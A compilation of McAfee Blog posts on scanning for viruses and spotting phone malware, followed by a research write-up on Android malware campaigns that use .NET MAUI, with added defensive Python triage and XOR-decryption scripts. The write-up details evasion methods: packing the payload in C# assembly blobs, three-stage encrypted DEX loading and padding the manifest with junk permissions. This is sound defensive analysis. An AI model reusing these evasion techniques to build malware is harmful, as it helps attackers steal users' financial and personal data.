    When selecting the right antivirus software, look beyond a basic virus scan and consider these key features:

    • Real-time protection. This is paramount, as it actively blocks threats before they can execute.
    • An effective solution must also have a minimal performance impact so it doesn’t slow down your device.
    • Look for a program with an intuitive interface that makes it easy to schedule scans and manage settings.
    • The best protection goes beyond a simple virus detector. It should include features such as a firewall, a secure VPN for safe browsing, and identity protection.
    • Look for reliable brands with positive reviews and clear privacy policies, and that provide a powerful virus scanner and proactive protection for both Android and iOS devices.

    2. Initiate the scan

    The process of checking for viruses depends on the device type and its operating system. Generally, however, the virus scanner will display a “Scan” button to start the process of checking your system’s files and apps.

    Here are more specific tips to help you scan your computers, phones and tablets:

    On a Windows computer

    On Windows 10 and 11, Microsoft Defender Antivirus (formerly Windows Defender) is built into the operating system and enabled by default unless another antivirus product has registered itself and taken over. To run a scan on Windows 11, open Settings and go to Privacy & security > Windows Security > Virus & threat protection (on Windows 10 the path is Settings > Update & Security > Windows Security). The page shows whether any action is needed and offers a Quick scan button; under Scan options you can run a Full scan, a Custom scan of chosen folders, or a Microsoft Defender Offline scan, which reboots and scans before Windows loads and is the option to use for malware that hides from a running system. Defender provides a solid baseline at no extra cost; third-party suites add features such as a firewall manager, a VPN, and identity monitoring. Whichever you choose, run only one real-time antivirus engine at a time, since two competing engines slow the machine and can interfere with each other.

    On a Mac computer

    macOS includes its own protections, Gatekeeper (which blocks unsigned or unnotarized apps), XProtect (signature-based malware blocking), and the Malware Removal Tool, but they run silently in the background and offer no user-initiated “scan now” button. To scan a Mac on demand you therefore need third-party security software. As mentioned, free antivirus applications are available online, but we recommend investing in trusted software that is proven to protect you from cyberthreats.

    If you decide to invest in more robust antivirus software, running a scan is usually straightforward and intuitive. For more detailed instructions, we suggest searching the software’s help menu or going online and following their step-by-step instructions.

    On smartphones and tablets

    Smartphones and tablets are used for nearly everything in daily life, from banking and email to messaging and storing personal information. That makes them a target: they can be infected through malicious apps, especially those sideloaded from unofficial stores, through phishing links sent by text or email, or over compromised Wi-Fi networks.

    Regular virus scans with mobile security software are crucial for protecting your devices. Be aware, however, that Android and iOS merit distinct solutions.

    Antivirus products for Android abound, because Android lets a security app inspect installed packages and downloaded files, and because it allows apps to be sideloaded from outside Google Play, which is where most Android malware arrives. On iPhones and iPads, Apple’s security model, in particular app sandboxing and App Store review, makes traditional viruses rare, and it also prevents a third-party app from reading other apps’ data. So-called iOS antivirus apps therefore cannot perform a classic file scan; what they offer is web and phishing protection, Wi-Fi network checks, and alerts for risky settings. iOS devices are not immune to every threat, however: you can still fall for phishing scams, connect to insecure Wi-Fi, or be tricked into installing a malicious configuration profile. Signs of a compromise include unfamiliar calendar events or subscriptions, frequent browser redirects, unexpected pop-ups, and a profile you did not install listed under Settings > General > VPN & Device Management.

    Because Apple’s closed platform does not accept unvetted third-party software, look for security tools on Apple’s official App Store rather than anywhere else.

    Scanning files and attachments safely

    Before you open any downloaded file or email attachment, it’s wise to check it for threats. On Windows, right-click the file in File Explorer and choose “Scan with Microsoft Defender” (on Windows 11 it may sit under “Show more options”); installed third-party antivirus products add their own entry to the same menu. macOS has no built-in scan command in Finder; the option appears there only if your security software has installed a Finder extension, otherwise open the product and point it at the file.

    For an added layer of security, especially for files from unknown sources, you can use a web-based file-checking service. These websites let you upload a file, which is then analyzed by multiple antivirus engines. Two caveats apply. Anything you upload is shared with the service and often with its partners, so do not upload confidential documents; most of these services also let you look up a file’s hash instead of uploading it, which answers the question without disclosing the file. And a clean result from every engine only means no engine recognizes the file yet, which is exactly what a new or well-packed sample looks like. Many email clients scan incoming attachments automatically, but a manual check before you open a file is the last line of defense before execution.
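    The hash-first approach above, and a way to confirm your own scanner is actually watching, as an added example that is not part of the McAfee article: the script hashes every file in a folder and matches it against a known-bad list, and it can drop the industry-standard EICAR test file, which is harmless but which every mainstream antivirus is designed to detect. The known-bad list here is a constructed placeholder holding only EICAR’s published SHA-256; in practice you would fill it from a feed you trust.

```python
"""Offline hash triage for downloaded files, plus an EICAR self-test.

Added example, not McAfee's code. KNOWN_BAD is a constructed placeholder
holding one entry, the SHA-256 of the harmless EICAR test string that every
mainstream antivirus is designed to detect; replace it with hashes from a
feed you trust. Hash lookup tells you whether a file is already known bad
without uploading the file anywhere.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# The EICAR test string, assembled from two pieces so this source file is
# not itself flagged. Its SHA-256 is published by EICAR and AV vendors.
_EICAR_PARTS = ("X5O!P%@AP[4\\PZX54(P^)7CC)7}$",
                "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*")
EICAR_SHA256 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"

# Constructed known-bad list: sha256 -> label.
KNOWN_BAD = {EICAR_SHA256: "EICAR-Test-File (not a virus)"}


def eicar_bytes() -> bytes:
    return "".join(_EICAR_PARTS).encode("ascii")


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk=1 << 20) -> str:
    """Hash in chunks so a multi-gigabyte download does not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def triage_directory(folder) -> dict:
    """Return {relative_path: label} for every file whose hash is known bad."""
    hits = {}
    for p in Path(folder).rglob("*"):
        if p.is_file():
            label = KNOWN_BAD.get(sha256_file(p))
            if label:
                hits[str(p.relative_to(folder))] = label
    return hits


def write_eicar(folder) -> str:
    """Drop eicar.com into `folder`. A working real-time scanner quarantines
    it on write; if the file is still there a minute later, nothing is
    watching that folder."""
    path = os.path.join(folder, "eicar.com")
    with open(path, "wb") as f:
        f.write(eicar_bytes())
    return path


def self_test() -> dict:
    """Write EICAR to a scratch directory and triage it (cleaned up after)."""
    with tempfile.TemporaryDirectory() as d:
        write_eicar(d)
        return triage_directory(d)


if __name__ == "__main__":
    print(self_test())
```

    Run it once with real-time protection on: if your antivirus is working, eicar.com is quarantined as soon as it is written and the scanner raises an alert; if the file just sits there, the folder is not being watched, which is worth knowing before you trust that folder for downloads.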

    3. Review scan results and take action

    Once the scan is complete, the tool will display a report of any threats it found, including the name of the malware and the location of the infected file. If your antivirus software alerts you to a threat, don’t panic—it means the program is doing its job.

    The first and most critical step is to follow the software’s instructions. It will usually quarantine the malicious file, which moves it to an isolated store where it cannot run. Review the threat details your scanner provides; if you do not recognize the file as something you need, deleting it from quarantine is usually the safest option. If the scanner flags a program you rely on, keep it in quarantine rather than restoring it immediately and check the detection name with the vendor, because false positives do happen.

    After the threat is handled, ensure your antivirus software and operating system are fully updated. Finally, run a new, full system virus scan to confirm that all traces of the infection have been eliminated. Regularly backing up your important data to an external drive or cloud service can also be a lifesaver in the event of a serious infection.

    4. Schedule an automatic scan for continuous protection

    The most effective way to maintain your device’s security is to automate your defenses. Real-time protection already inspects files as they are written or opened, so a scheduled scan is a second net rather than the first. A quality antivirus suite lets you schedule scans so you do not have to remember them: a daily quick scan of the locations malware most often uses (startup items, memory, system folders) is fast and cheap, and a weekly full scan covers everything else. Beyond that, run a manual scan when you notice something dubious, such as crashes or excessive pop-ups, or right after installing software from an unfamiliar source.

    Final thoughts

    These days, it is essential to stay ahead of the wide variety of continuously evolving cyberthreats. Your first line of defense against these threats is to regularly conduct a virus scan. You can choose among the many free yet limited-time products or comprehensive, cloud-based solutions.

    While many free versions legitimately do what they advertise, be cautious: most are baseline tools, some are malware in disguise, and they generally lack the continuous, real-time protection needed to block threats before they run.

    A better option is to invest in a verified, trustworthy, all-in-one product such as McAfee+, which, aside from its virus scanner, also offers a firewall, a virtual private network, and identity protection. For complete peace of mind, a paid solution like McAfee Total Protection proactively safeguards your devices and data in real time, 24/7.

    The post How to Scan for Viruses and Confirm Your Device Is Safe appeared first on McAfee Blog.

    7 Signs Your Phone Is Infected With a Virus

    By: McAfee

    We use our smartphones for everything under the sun, from work-related communication to online shopping, banking transactions, and social media. For this reason, our phones store a lot of personal data, including contacts, account details, and bank account logins.

    Heavy use also makes your phone a target for viruses, a type of malware that replicates itself and spreads through the system, and for the broader range of mobile malware that is loosely called by the same name. They can degrade your phone’s performance or, worse, steal sensitive information that criminals can turn into money.

    In this article, we will give you a rundown of viruses that can infect your phone and how you can identify and eliminate them. We will also provide some tips for protecting your phone from viruses in the first place.

    Phone Virus on iOS vs Android

    iPhones and Android devices run different operating systems, and the differences in their design affect how easily malware gets in and how far it can spread once it does.

    While iOS hacks can still happen, Apple’s operating system is reputed to be highly resistant to viruses because of its design. By restricting interactions between apps, Apple’s operating system limits the movement of a virus across the device. However, if you jailbreak your iPhone or iPad to unlock other capabilities or install third-party apps, then the security restrictions set by Apple’s OS won’t work. This exposes your iPhone and you to vulnerabilities that cybercriminals can exploit. 

    Android phones are also designed with security in mind, but the platform is more open: users can sideload apps and install from alternative stores, and many devices receive security updates late or not at all. Curated third-party stores such as Amazon’s or the Samsung Galaxy Store vet what they carry, but the same sideloading capability lets a user install an APK from any website, and that is where most Android malware comes from.

    Types of phone viruses

    Cybercriminals today are sophisticated and can launch a variety of attacks on your smartphone. “Virus” is used loosely here; the categories of malicious software you are likely to meet on a phone include:

    • Malware: the umbrella term for any program that steals your information or takes control of your device without your permission; everything below is a kind of malware.
    • Adware: software that floods the device with ads, often through an app you installed for another purpose. Some adware also collects browsing data, and tapping its ads can lead to further downloads.
    • Ransomware: locks you out of your phone or your files until you pay the attacker, who may also threaten to publish personal data such as photos.
    • Spyware: tracks your activity and harvests messages, contacts, credentials, and location, sending them to the attacker and often slowing the phone in the process.
    • Trojan: aptly named, a program that hides inside an app that appears legitimate, such as a fake banking app, and uses that disguise to take control of or steal from your phone.

    Common ways phones get infected

    Ultimately, contracting a virus on your phone or computer comes down to your browsing and downloading habits. These are the most common ways it could happen:

    • Clicking on links or attachments from unverified sources, which are mostly distributed through emails and text messages
    • Clicking on seemingly innocent ads that take you to an unsecured webpage or download mobile malware to your device
    • Visiting questionable websites, often ignoring security warnings
    • Downloading malicious apps from unverified sources, usually outside the Apple App Store or Google Play Store
    • Connecting to an unsecured internet connection, like public Wi-Fi

    7 signs your phone has a virus

    Now that you know how your phone could be infected by a virus, look out for these seven signs that occur when malicious software is present:

    1. You see random pop-up ads or new apps

    Most pop-up ads don’t carry viruses but are only used as marketing tools. However, if you find yourself closing pop-up ads more often than usual, it might indicate a virus on your phone. These ads might be coming from apps in your library that you didn’t install. In this case, uninstall them immediately as they tend to carry malware that’s activated when the app is opened or used.

    2. Your device feels physically hot

    Malware that runs constantly in the background, such as adware fetching ads, a cryptominer, or spyware uploading your data, keeps the processor and radios busy. That extra work shows up as a phone that feels hot even when you are not using it.

    3. Random messages are sent to your contacts

    If your contacts receive unsolicited scam emails or messages on social media from your account, especially those containing suspicious links, a virus may have accessed your contact list. It’s best to let all the recipients know that your phone has been hacked so that they don’t download any malware themselves or forward those links to anybody else.

    4. The device responds slowly

    An unusually slow-performing device is a hint of suspicious activity on your phone. The device may be slowing down because it is working harder to support the downloaded virus. Alternatively, unfamiliar apps might be taking up storage space and running background tasks, causing your phone to run more slowly.

    5. You find fraudulent charges on your accounts

    Are you finding credit card transactions in your banking statements that you don’t recognize? It could be an unfamiliar app or malware making purchases through your account without your knowledge.

    6. The phone uses excess data

    A sudden rise in your data usage or phone bill can be suspicious. A virus might be running background processes or using your internet connection to transfer data out of your device for malicious purposes.

    7. Your battery drains quickly

    An unusually quick battery drain may also cause concern. Your phone will be trying to meet the energy requirements of the virus, so this problem is likely to persist for as long as the virus is on the device.

    How to Detect and Remove a Virus on Your Phone

    You may suspect that a virus resides on your phone, but the only way to be sure is to check. The easiest way is to install a trustworthy mobile security app, which will scan installed apps and downloads, warn you about phishing links, and help secure any public connections you use.

    Another way to check your phone is to follow these step-by-step processes, depending on the type of phone you use:

    How to check your iPhone for a virus

    1. Check battery usage: Go to Settings > Battery. Scroll down to see the battery usage by app. If you see an app you don’t recognize or an app with unusually high usage, it could be a sign of malicious activity.
    2. Review app list and storage: Carefully examine all the apps installed on your phone. If you find an app that you don’t remember downloading, it could be malware. Uninstall it immediately. Also, check Settings > General > iPhone Storage for any strange or unexpected data usage by apps.
    3. Monitor data consumption: Navigate to Settings > Cellular. Review the data usage for each app. A virus on your phone can consume large amounts of data by running in the background and communicating with a hacker’s server.
    4. Look for jailbreak evidence: If you didn’t jailbreak your phone but see apps like Cydia or Sileo, it’s a major red flag. Someone with physical access to your phone may have jailbroken it to install spyware or other malware.
    5. Run an iOS security app: For peace of mind and a thorough check, use a reputable security application to help you scan for system threats, secure your wi-fi connection, and help identify risks that are not immediately obvious.

    How to check for a virus on an Android device

    1. Utilize Google Play Protect: This Android’s built-in malware protection is your first line of defense to know if your phone has a virus. Open the Google Play Store app, tap on your profile icon, and select Play Protect. Tap “Scan” to check your apps for harmful behavior.
    2. Boot into safe mode: If your phone is lagging or crashing, restarting in Safe Mode can help. Press and hold the power button, then tap and hold the “Power off” option until the “Reboot to safe mode” prompt appears. In Safe Mode, all third-party apps are disabled. If the issues disappear, a recently installed app is likely the culprit. You can then uninstall suspicious apps one by one.
    3. Review app permissions: Go to Settings > Apps and check the permissions for each app. Is a simple game asking for access to your contacts and microphone? That’s a red flag. Revoke any permissions that seem unnecessary for an app’s function. This helps prevent spyware from collecting your data.
    4. Install a trusted antivirus app: For the most comprehensive protection, install a top-rated security app like McAfee Mobile Security. Running a full scan will detect and help you quarantine or remove malicious files and apps that built-in tools might miss, providing a clear path on how to clean your phone from a virus.

    How to remove a virus from your device

    Once you have determined that a virus is present on your iPhone or Android device, there are several things you can do. 

    • Download antivirus software or a mobile security app to help you locate existing viruses and malware. By identifying the exact problem, you know what to get rid of and how to protect your device in the future. 
    • Do a thorough sweep of your app library to make sure that whatever apps are on your phone were downloaded by you. Delete any apps that you’re unfamiliar with.
    • To protect your information, delete any sensitive text messages and clear history regularly from your mobile browsers. Empty the cache in your browsers and apps.
    • In some instances, you may need to reset your smartphone to its original factory settings. This erases everything on the device, so back up important documents and photos first. When you set the phone up again, restore your data but reinstall apps individually from the official store rather than restoring an app backup that may bring the malicious app back with it.
    • Create strong passwords for all your accounts after cleaning up your phone, and keep them in a password manager, which stores them encrypted so only you can access them.

    8 tips to protect your phone from viruses

    Caring for your phone is a vital practice to protect your information. Follow these tips to stay safe online and help reduce the risk of your phone getting a virus. 

    • Only download apps from a trusted source, i.e., the app store or other verified stores. Before installing, read the app reviews and understand how the app intends to use your data.
    • Set up strong, unique passwords for your accounts instead of reusing the same or similar passwords. This prevents a domino effect in case one of the accounts is compromised.
    • Think twice before you click on a link. If a link looks suspicious, trust your gut! Avoid clicking on it until you have more information about its trustworthiness. These links can be found across messaging services and are often part of phishing scams. 
    • Clear your cache periodically. Scan your browsing history to get rid of any links that seem suspicious. 
    • Avoid saving login information on your browsers and log out when you’re not using a particular browser. Although this is a convenience trade-off, it’s harder for malware to access accounts you’re not logged into during the attack.
    • Update your operating system and apps frequently. Regular updates build upon previous security features. Sometimes, these updates contain security patches created in response to specific threats in prior versions. 
    • Don’t give an app all the permissions it asks for. Instead, you can choose to give it access to certain data only when required. Minimizing an application’s access to your information keeps you safer.
    • Avoid unsecured internet connections such as public Wi-Fi. If you must use one, a reputable virtual private network encrypts your traffic between your device and the VPN server, so anyone on the local network sees only encrypted data.

    Final Thoughts

    You rely heavily on your smartphone for many online activities, and it stores much of your personal data, including contacts, account details, and banking logins. That puts the device at high risk: an infection can degrade your phone’s performance and hand that data to cybercriminals.

    To help you protect your device and personal information, the award-winning McAfee Mobile Security solution regularly scans for threats transmitted through suspicious links in text messages, emails, or downloads, and blocks them in real time. McAfee Mobile Security is a reputable security application that filters risky emails and phishing attempts, so your inbox stays secure while providing a secure virtual private network. It is also capable of spotting deepfake videos, so you can stay ahead of misinformation. With McAfee, you can rest easy knowing your mobile phone is protected from the latest cyberthreats.

    The post 7 Signs Your Phone Is Infected With a Virus appeared first on McAfee Blog.

    New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI 

    Authored by Dexter Shin 

    Summary 

    Cybercriminals are constantly evolving their techniques to bypass security measures. Recently, the McAfee Mobile Research Team discovered malware campaigns abusing .NET MAUI, a cross-platform development framework, to evade detection. These threats disguise themselves as legitimate apps, targeting users to steal sensitive information. This blog highlights how these malware operate, their evasion techniques, and key recommendations for staying protected. 

    Background 

    In recent years, cross-platform mobile development frameworks have grown in popularity. Many developers use tools like Flutter and React Native to build apps that work on both Android and iOS. Among these tools, Microsoft provides a framework based on C#, called Xamarin. Since Xamarin is well-known, cybercriminals sometimes use it to develop malware. We have previously found malware related to this framework. However, Microsoft ended support for Xamarin in May 2024 and introduced .NET MAUI as its replacement.

    Unlike Xamarin, .NET MAUI expands platform support beyond mobile to include Windows and macOS. It also runs on .NET 6+, replacing the older .NET Standard, and introduces performance optimizations with a lightweight handler-based architecture instead of custom renderers.

    As technology evolves, cybercriminals adapt as well. Reflecting this trend, we recently discovered new Android malware campaigns developed using .NET MAUI. These apps have their core functionality written entirely in C# and stored as assembly blobs inside the package. Unlike traditional Android apps, the logic does not live in the DEX files or native libraries, yet those are exactly the components many antivirus engines analyze for malicious behavior. As a result, .NET MAUI acts as a kind of packer, allowing the malware to evade detection and remain active on devices for a long time.

    In the following sections, we will introduce two Android malware campaigns that use .NET MAUI to evade detection. These threats disguise themselves as legitimate services to steal sensitive information from users. We will explore how they operate and why they pose a significant risk to mobile security.

    Am I protected? 

    McAfee Mobile Security already detects all of these apps as Android/FakeApp and protects users from these threats. For more information about our Mobile Product, visit McAfee Mobile Security. 

    Technical Findings  

    While we found multiple versions of these malicious apps, the following two examples are used to demonstrate how they evade detection. 

    First off, where do users find these malicious apps? Typically on unofficial app stores, reached through phishing links shared in messaging groups or sent by text message. This is why McAfee recommends that users avoid clicking untrusted links.

    Example 1: Fake Bank App 

    The first fake app we found disguises itself as IndusInd Bank, specifically targeting Indian users. When a user launches the app, it prompts them to input personal and financial details, including their name, phone number, email, date of birth, and banking information. Once the user submits this data, it is immediately sent to the attacker’s C2 (Command and Control) server. 

     

    Figure 1. Fake IndusInd Bank app’s screen requesting user information

    As mentioned earlier, this is not a traditional Android malware. Unlike typical malicious apps, there are no obvious traces of harmful code in the Java or native code. Instead, the malicious code is hidden within blob files located inside the assemblies directory. 

     

    Figure 2. Blob contains malicious code 
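    A triage script for the packaging pattern just described, as an added example that is not McAfee’s tooling and not taken from the samples: it opens an APK (a zip file), looks for the assemblies/ directory and the Mono runtime libraries that a Xamarin or .NET MAUI build ships, and classifies each assembly by its header, MZ for a plain PE/.NET assembly, XALZ for Xamarin’s LZ4-compressed form, XABA for the assembly store (assemblies.blob). The sample APK is constructed in memory from those markers only. A hit says “the logic is in C#, not in classes.dex”, which is true of every legitimate MAUI app too; it is the cue to decompile the assemblies rather than stop at the DEX. As a caveat, newer .NET for Android versions may package assemblies differently (for example under lib/), so treat an empty assemblies/ directory as inconclusive rather than clean.

```python
"""Triage an APK for .NET MAUI / Xamarin packaging markers.

Added example, not McAfee's tooling. The sample APK is constructed in
memory; only file names and leading bytes matter here. Markers:
  - assemblies/*.dll or assemblies/assemblies.blob
  - "XALZ" header: Xamarin LZ4-compressed assembly
  - "XABA" header: Xamarin assembly store (assemblies.blob)
  - "MZ" header: plain PE/.NET assembly
  - Mono runtime libs under lib/<abi>/
A positive result is not proof of malice; it tells the analyst where the
real code is, which is not classes.dex.
"""
import io
import zipfile

MONO_LIBS = {"libmonodroid.so", "libmonosgen-2.0.so", "libxamarin-app.so"}


def classify_assembly(head: bytes) -> str:
    if head.startswith(b"XALZ"):
        return "lz4-compressed .NET assembly"
    if head.startswith(b"XABA"):
        return "assembly store (blob)"
    if head.startswith(b"MZ"):
        return "plain PE/.NET assembly"
    return "unknown"


def triage_apk(apk_bytes: bytes) -> dict:
    result = {"assemblies": {}, "mono_libs": [], "has_dex": False, "dotnet": False}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            base = name.rsplit("/", 1)[-1]
            if name.startswith("classes") and name.endswith(".dex"):
                result["has_dex"] = True
            elif name.startswith("assemblies/") and name.endswith((".dll", ".blob")):
                # Read only the header; assemblies can be large.
                result["assemblies"][name] = classify_assembly(z.read(name)[:8])
            elif name.startswith("lib/") and base in MONO_LIBS:
                result["mono_libs"].append(name)
    result["dotnet"] = bool(result["assemblies"]) or bool(result["mono_libs"])
    return result


def build_sample_apk() -> bytes:
    """Constructed stand-in for a MAUI package (not a real malware sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")           # binary XML header
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 32)         # thin Java shim
        z.writestr("lib/arm64-v8a/libmonodroid.so", b"\x7fELF" + b"\x00" * 16)
        z.writestr("assemblies/BankApp.dll", b"XALZ\x00\x00\x00\x00" + b"\x00" * 16)
        z.writestr("assemblies/assemblies.blob", b"XABA\x01\x00\x00\x00")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_apk(build_sample_apk()))
```

    On a real package, feed triage_apk the APK’s bytes; when dotnet is true and has_dex is also true, the DEX is almost certainly just the Mono bootstrap, and the strings, C2 URLs, and data-collection code will be in the assemblies.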

    The following code snippet shows how the app collects and transmits user data to the C2 server. The app packs the collected fields as request parameters before sending them.

    Figure 3. C# code responsible for stealing user data and sending it to the C2 server   

    Example 2: Fake SNS App  

    In contrast to the first fake app, this second malware is even more difficult for security software to analyze. It specifically targets Chinese-speaking users and attempts to steal contacts, SMS messages, and photos from their devices. In China, where access to the Google Play Store is restricted, such apps are often distributed through third-party websites or alternative app stores. This allows attackers to spread their malware more easily, especially in regions with limited access to official app stores. 

    Figure 4. Distribution site and fake X app targeting Chinese-speaking users 

    One of the key techniques this malware uses to remain undetected is multi-stage dynamic loading. Instead of directly embedding its malicious payload in an easily accessible format, it encrypts and loads its DEX files in three separate stages, making analysis significantly more difficult. 

    In the first stage, the app’s main activity, defined in AndroidManifest.xml, decrypts an XOR-encrypted file and loads it dynamically. This initial file acts as a loader for the next stage. In the second stage, the dynamically loaded file decrypts another AES-encrypted file and loads it. This second stage still does not reveal the core malicious behavior but serves as another layer of obfuscation. Finally, in the third stage, the decrypted file contains code related to the .NET MAUI framework, which is then loaded to execute the main payload. 

    Figure 5. Multi-stage dynamic loading 
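    The stage-1 XOR layer described above is the one piece an analyst can usually undo without reading the decryption routine, because the output has to be a DEX file and a DEX header carries known bytes at known offsets: the magic “dex\n” at offset 0 (followed by a version number and a NUL), header_size 0x70 at offset 0x24, and endian_tag 0x12345678 at offset 0x28. The script below, an added example rather than the malware’s own code, derives a candidate repeating key of each length from those known bytes, rejects lengths where the evidence conflicts or leaves part of the key undetermined, and returns the shortest key that fits. The encrypted blob is constructed here with a made-up key (k3y!); the AES stage that follows in the real sample needs a key lifted from the loader code and is not covered.

```python
"""Recover a stage-1 repeating-key XOR layer from known DEX header bytes.

Added example, not the malware's own code. Stage-1 loaders of this kind
XOR an embedded file with a short key and hand the result to a class
loader. The decrypted file must be a DEX, and a DEX header has fixed bytes
at fixed offsets, which is enough known plaintext to recover a short key
and to reject wrong key lengths. The encrypted blob here is constructed
with a made-up key.
"""
from typing import Optional

# Offset -> bytes every valid DEX file carries (dex format, header_item).
# The version digits after "dex\n" vary (035/037/038/039), so they are not
# assumed; header_size is always 0x70 and endian_tag is 0x12345678 (LE).
KNOWN = {
    0x00: b"dex\n",
    0x07: b"\x00",              # NUL terminating the magic
    0x24: b"\x70\x00\x00\x00",  # header_size
    0x28: b"\x78\x56\x34\x12",  # endian_tag
}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, max_key_len: int = 16) -> Optional[bytes]:
    """Return the shortest repeating key consistent with all known bytes.

    Each known (offset, plaintext) pair fixes key[offset % klen]. A length
    is rejected if two pairs disagree about the same slot, or if some slot
    is never fixed (the key could not be fully recovered from the header)."""
    for klen in range(1, max_key_len + 1):
        slots: list = [None] * klen
        consistent = True
        for off, chunk in KNOWN.items():
            for i, p in enumerate(chunk):
                pos = off + i
                if pos >= len(ciphertext):
                    consistent = False
                    break
                k = ciphertext[pos] ^ p
                if slots[pos % klen] is None:
                    slots[pos % klen] = k
                elif slots[pos % klen] != k:
                    consistent = False   # conflicting evidence: wrong length
                    break
            if not consistent:
                break
        if consistent and None not in slots:
            return bytes(slots)
    return None


def decrypt_stage(ciphertext: bytes) -> Optional[bytes]:
    """Decrypt with the recovered key; None if no key fits or output is not DEX."""
    key = recover_key(ciphertext)
    if key is None:
        return None
    plain = xor_bytes(ciphertext, key)
    return plain if plain.startswith(b"dex\n") else None


def build_sample_plain() -> bytes:
    """Constructed DEX header (checksum/signature left zero) plus filler."""
    hdr = bytearray(0x70)
    hdr[0:8] = b"dex\n035\x00"
    hdr[0x24:0x28] = b"\x70\x00\x00\x00"
    hdr[0x28:0x2C] = b"\x78\x56\x34\x12"
    return bytes(hdr) + b"Lcom/example/Loader;\x00"


SAMPLE_KEY = b"k3y!"
SAMPLE_PLAIN = build_sample_plain()
SAMPLE_CIPHER = xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    print(recover_key(SAMPLE_CIPHER), decrypt_stage(SAMPLE_CIPHER)[:8])
```

    The known header bytes cover key positions 0 through 7 twice over, so keys of up to eight bytes are recovered and verified, and a blob that is not XOR-encrypted DEX (all zeros, or AES output) returns None rather than a spurious key. If the loader uses a longer key, the same idea still works, but you need more known plaintext, for example the map_off and string_ids fields once you know the DEX layout of the payload.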

    The main payload is ultimately hidden within the C# code. When the user interacts with the app, such as pressing a button, the malware silently steals their data and sends it to the C2 server. 


    Figure 6. C# code responsible for stealing images, contacts, and SMS data 

    Beyond multi-stage dynamic loading, this malware also employs additional tricks to make analysis more difficult. One technique is manipulating the AndroidManifest.xml file by adding an excessive number of unnecessary permissions. These permissions include large amounts of meaningless, randomly generated strings, which can cause errors in certain analysis tools. This tactic helps the malware evade detection by disrupting automated scanners and static analysis. 

     

    Figure 7. AndroidManifest.xml file with excessive random permissions 
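    A way to turn the manifest-padding trick into a detection signal, as an added example that is not McAfee’s code: the script reads a decoded AndroidManifest.xml (plain XML, as produced by an APK decoder such as apktool, not the binary AXML inside the package), counts the uses-permission entries, flags names that fall outside the platform namespaces and are not even well formed, and separately lists the runtime permissions covering the contacts, SMS, and photos this campaign steals, which is the same list worth checking on-device under Settings > Apps. The sample manifest is constructed, with a handful of real permissions plus randomly named junk entries, and the thresholds are assumptions rather than published numbers.

```python
"""Flag permission padding in a decoded AndroidManifest.xml.

Added example, not McAfee's code. Input is the manifest as an APK decoder
such as apktool writes it (plain XML), not the binary AXML inside the
package. The sample manifest is constructed: real permissions matching
what the fake SNS app steals, plus junk entries with random names of the
kind used to bloat the file. Thresholds are assumptions.
"""
import random
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
KNOWN_PREFIXES = ("android.permission.", "com.google.android.", "com.android.")
# Real custom permissions are reverse-DNS lowercase segments ending in an
# UPPER_SNAKE name, e.g. com.example.app.permission.C2D_MESSAGE.
WELL_FORMED = re.compile(r"[a-z][a-z0-9_]*(\.[a-z0-9_]+)*\.[A-Z][A-Z0-9_]*")
# Runtime permissions that cover the data the fake SNS app exfiltrates.
SENSITIVE = {
    "android.permission.READ_CONTACTS",
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.READ_MEDIA_IMAGES",
}
MAX_REASONABLE = 50   # assumption: more declared permissions than this is padding
MIN_JUNK = 5          # assumption: this many malformed names is padding


def is_suspicious(name: str) -> bool:
    """A name outside the platform namespaces that is not even well formed."""
    if name.startswith(KNOWN_PREFIXES):
        return False
    return WELL_FORMED.fullmatch(name) is None


def triage_manifest(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    names = [el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")]
    suspicious = [n for n in names if is_suspicious(n)]
    return {
        "package": root.get("package"),
        "total": len(names),
        "sensitive": sorted(set(names) & SENSITIVE),
        "suspicious": suspicious,
        "padded": len(names) > MAX_REASONABLE or len(suspicious) >= MIN_JUNK,
    }


def build_sample_manifest(junk: int = 40, seed: int = 1) -> str:
    """Constructed manifest: real permissions plus `junk` random-named ones."""
    rng = random.Random(seed)
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    legit = [
        "android.permission.INTERNET",
        "android.permission.READ_CONTACTS",
        "android.permission.READ_SMS",
        "android.permission.READ_EXTERNAL_STORAGE",
        "com.example.fakesns.permission.C2D_MESSAGE",
    ]
    padding = ["".join(rng.choices(alphabet, k=rng.randint(10, 16))) for _ in range(junk)]
    lines = [f'    <uses-permission android:name="{n}"/>' for n in legit + padding]
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android"\n'
            '    package="com.example.fakesns">\n' + "\n".join(lines) + "\n</manifest>\n")


if __name__ == "__main__":
    r = triage_manifest(build_sample_manifest())
    print(r["total"], r["sensitive"], r["padded"], r["suspicious"][:3])
```

    Two notes on use: parse with a streaming parser (ET.iterparse) rather than fromstring if a manifest is large enough to be the very thing crashing your other tools, and treat the sensitive list as context, not a verdict, since a real messaging app legitimately declares READ_CONTACTS and READ_SMS; it is the combination of sensitive permissions, padding, and .NET MAUI packaging that is unusual.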

